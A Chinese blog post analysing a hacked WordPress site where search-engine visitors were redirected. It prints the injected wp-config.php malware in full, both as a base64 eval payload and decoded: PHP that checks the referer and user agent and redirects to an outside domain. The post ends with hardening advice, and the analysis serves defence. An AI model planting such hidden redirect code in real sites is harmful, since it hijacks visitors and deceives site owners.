今天一个sxyseo的用户的worpdress网站出现了一个怪异的问题:
直接访问正常,但是从搜索引擎访问则会跳转到别的网站。
比如直接访问sxyseo没问题,但是如果在google site:sxyseo.com 然后访问链接就会跳转到别人的网站。
很明显,凡是有http-referer的都被重定向了,所以最初起初判断是htaccess被挂马了,但是经过检查,htaccess没问题。
后来就怀疑到wordpress本身被挂马了,因为判断http-referer,从而进行重定向,不是htacces在做坏事就是php本身了。
用户将文件下载下来,windows杀毒软件马上预报病毒,病毒文件是wp-config.php
打开wp-config.php,果然,顶部被挂了一段代码:
<
p style=”white-space:normal;text-transform:none;word-spacing:0px;color:#000000;text-align:left;font:14px/25px verdana, arial, helvetica, sans-serif;orphans:2;widows:2;letter-spacing:normal;background-color:#e5e2dd;text-indent:0px;-webkit-text-size-adjust:auto;-webkit-text-stroke-width:0px;”>
- eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vd3d3LmlzZmFydC5mYXJ0aXQuY29tLyIpOw0KZXhpdCgpOw0KfQp9Cn0NCn0NCn0="));
base64解开代码,如下:
<
p style=”white-space:normal;text-transform:none;word-spacing:0px;color:#000000;text-align:left;font:14px/25px verdana, arial, helvetica, sans-serif;orphans:2;widows:2;letter-spacing:normal;background-color:#e5e2dd;text-indent:0px;-webkit-text-size-adjust:auto;-webkit-text-stroke-width:0px;”>
- error_reporting(0);
- $qazplm=headers_sent();
- if (!$qazplm){
- $referer=$_SERVER[’HTTP_REFERER’];
- $uag=$_SERVER[’HTTP_USER_AGENT’];
- if ($uag) {
- if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){
- if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex.ru/yandsearch?(.*?)&lr=/",$referer) or preg_match ("/google.(.*?)/url?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
- if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
- header("Location: http://www.isfart.fartit.com/");
- exit();
- }
- }
- }
- }
- }
这段代码很搞笑,重定向仅在用户浏览器访问且浏览器不是IE7和IE6的时候进行重定向。也就是说这个代码不影响搜索引擎抓去,当然拉,被挂马的网站给他做嫁衣,当然是要让搜索引擎正常抓了。
最近两年,wordpress挂马很常见了,所以使用wordpress的用户:
- 谨慎安装插件;
- 谨慎安装不明的风格主题;
- 一定要及时升级wordpress
- 文件的权限一定要设置对,别学某些教程,动不动就叫你傻乎乎的设置为0777